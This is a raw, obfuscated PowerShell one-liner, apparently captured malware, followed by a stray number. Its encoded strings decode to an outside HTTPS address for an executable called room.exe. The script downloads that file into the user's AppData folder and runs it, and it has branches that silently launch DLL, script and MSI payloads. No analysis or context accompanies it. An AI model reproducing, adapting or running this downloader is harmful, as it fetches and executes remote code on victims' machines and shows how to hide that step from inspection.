powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function iuJPxTQS($IJCvcIeo, $gpgwsiJSczSj){[IO.File]::WriteAllBytes($IJCvcIeo, $gpgwsiJSczSj)};function EjoMCmvmrPhMtwTL($IJCvcIeo){if($IJCvcIeo.EndsWith((uytCRFyTKEJzlr @(47792,47846,47854,47854))) -eq $True){rundll32.exe $IJCvcIeo }elseif($IJCvcIeo.EndsWith((uytCRFyTKEJzlr @(47792,47858,47861,47795))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $IJCvcIeo}elseif($IJCvcIeo.EndsWith((uytCRFyTKEJzlr @(47792,47855,47861,47851))) -eq $True){misexec /qn /i $IJCvcIeo}else{Start-Process $IJCvcIeo}};function nyAhNYUptqM($swQIUCvOyYd){$GQRylVCycvBAcjMMivqF = New-Object (uytCRFyTKEJzlr @(47824,47847,47862,47792,47833,47847,47844,47813,47854,47851,47847,47856,47862));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gpgwsiJSczSj = $GQRylVCycvBAcjMMivqF.DownloadData($swQIUCvOyYd);return $gpgwsiJSczSj};function uytCRFyTKEJzlr($FCpZJhLpBNlnS){$KskPPnz=47746;$nuNRqvoYIqNT=$Null;foreach($HSXDbspEKMwPJOh in $FCpZJhLpBNlnS){$nuNRqvoYIqNT+=[char]($HSXDbspEKMwPJOh-$KskPPnz)};return $nuNRqvoYIqNT};function RrbwTHrSKoXiNsmhK(){$ASgAmoIXZipayyHcO = $env:AppData + '\';$qBzHfpVo = $ASgAmoIXZipayyHcO + 'room.exe'; if (Test-Path -Path $qBzHfpVo){EjoMCmvmrPhMtwTL $qBzHfpVo;}Else{ $LhrXdLIM = nyAhNYUptqM (uytCRFyTKEJzlr @(47850,47862,47862,47858,47861,47804,47793,47793,47848,47857,47863,47856,47846,47843,47862,47851,47857,47856,47848,47857,47860,47865,47857,47855,47847,47856,47861,47850,47847,47843,47854,47862,47850,47792,47845,47857,47855,47793,47860,47857,47857,47855,47792,47847,47866,47847));iuJPxTQS $qBzHfpVo $LhrXdLIM;EjoMCmvmrPhMtwTL $qBzHfpVo;};;;;}RrbwTHrSKoXiNsmhK;
2656